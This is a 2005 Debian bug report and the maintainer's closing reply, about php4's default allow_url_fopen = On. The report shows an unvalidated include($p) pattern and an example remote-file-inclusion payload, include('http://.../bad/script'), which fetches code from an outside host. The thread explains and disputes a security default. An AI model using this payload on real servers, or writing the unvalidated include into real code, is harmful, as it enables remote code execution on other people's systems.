[php-maint] Bug#344952: marked as done (php4: allow_url_fopen = On by default is insecure and there are bots exploiting this)

Debian Bug Tracking System owner at bugs.debian.org
Wed Dec 28 04:48:05 UTC 2005


Your message dated Wed, 28 Dec 2005 14:32:40 +1000
with message-id <43B21568.4070507 at 0c3.net>
and subject line [php-maint] Bug#344952: php4: allow_url_fopen = On by default is	insecure and there are bots exploiting this
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 27 Dec 2005 21:30:59 +0000
>From chris at niekel.net Tue Dec 27 13:30:59 2005
Return-path: <chris at niekel.net>
Received: from mimar.xs4all.nl ([213.84.37.15] helo=kira.niekel.net)
	by spohr.debian.org with esmtp (Exim 4.50)
	id 1ErMPK-00056d-QI
	for submit at bugs.debian.org; Tue, 27 Dec 2005 13:30:59 -0800
Received: from chris by kira.niekel.net with local (Exim 3.36 #1 (Debian))
	id 1ErMPB-0000yc-00; Tue, 27 Dec 2005 22:30:49 +0100
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Chris Niekel <chris at niekel.net>
To: Debian Bug Tracking System <submit at bugs.debian.org>
Subject: php4: allow_url_fopen = On by default is insecure and there are bots
 exploiting this
Message-ID: <20051227213049.2615.83727.reportbug at kira.niekel.net>
X-Mailer: reportbug 3.18
Date: Tue, 27 Dec 2005 22:30:49 +0100
Delivered-To: submit at bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
	(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
	autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: php4
Version: 4:4.4.0-4
Severity: normal

Hi,

The setting use_url_fopen is On by default, like upstream php4. This allows
code like:
    include($p); 
where $p is set in the url. This being exploited by people to make you do
    include('http://.../bad/script');

Although this is mostly a problem by the php-user, setting this option to
'Off' by default seems a good security trade-off to me.  (And yes, my site
was running some strange code, fortunately as www-data).

Regards,
Chris Niekel

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (500, 'testing'), (500, 'stable'), (50, 'unstable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.4.27-2-686
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages php4 depends on:
ii  libapache-mod-php4            4:4.4.0-4  server-side, HTML-embedded scripti
ii  php4-cgi                      4:4.4.0-4  server-side, HTML-embedded scripti
ii  php4-common                   4:4.4.0-4  Common files for packages built fr

php4 recommends no packages.

-- debconf information:
  php4/run_apache_sslconfig: true
  php4/run_apacheconfig: true
  php4/update_apache_php_ini: true

---------------------------------------
Received: (at 344952-done) by bugs.debian.org; 28 Dec 2005 04:33:33 +0000
>From adconrad at 0c3.net Tue Dec 27 20:33:33 2005
Return-path: <adconrad at 0c3.net>
Received: from loki.0c3.net ([69.0.240.48])
	by spohr.debian.org with esmtp (Exim 4.50)
	id 1ErT0H-0004KF-H3
	for 344952-done at bugs.debian.org; Tue, 27 Dec 2005 20:33:33 -0800
Received: from charon.0c3.net ([210.11.154.230] helo=[192.168.1.102])
	by loki.0c3.net with asmtp (Exim 4.34)
	id 1ErSzd-0002tP-DH; Tue, 27 Dec 2005 21:32:55 -0700
Message-ID: <43B21568.4070507 at 0c3.net>
Date: Wed, 28 Dec 2005 14:32:40 +1000
From: Adam Conrad <adconrad at 0c3.net>
User-Agent: Mozilla Thunderbird 1.0.7 (X11/20051013)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Chris Niekel <chris at niekel.net>,  344952-done at bugs.debian.org
Subject: Re: [php-maint] Bug#344952: php4: allow_url_fopen = On by default
 is	insecure and there are bots exploiting this
References: <20051227213049.2615.83727.reportbug at kira.niekel.net>
In-Reply-To: <20051227213049.2615.83727.reportbug at kira.niekel.net>
X-Enigmail-Version: 0.92.1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Spam-Score: / (0.0)
X-Scan-Signature: 9f08059c6f1203c53574ae8d28029c1f
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
	(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
	autolearn=no version=2.60-bugs.debian.org_2005_01_02

Chris Niekel wrote:
> 
> The setting use_url_fopen is On by default, like upstream php4. This allows
> code like:
>     include($p); 
> where $p is set in the url. This being exploited by people to make you do
>     include('http://.../bad/script');

If you are blindly including random files that users tell you to with no
input validation, you have more fundamental problems than whether or not
they can inject remote files.  I could rampage all over your filesystem
like that as well.

The bottom line, of course, is that allow_url_fopen is incredibly
convenient when used correctly, and I'd be willing to bet a lot of 3rd
party PHP apps in Debian rely on it in one way or another (I know I
certainly have in the past), and disabling random functionality in the
default PHP setup is no substitute for learning the basics of secure
programming.

Pretty please, with sugar on top, validate input given to you from
untrusted sources.

... Adam



More information about the pkg-php-maint mailing list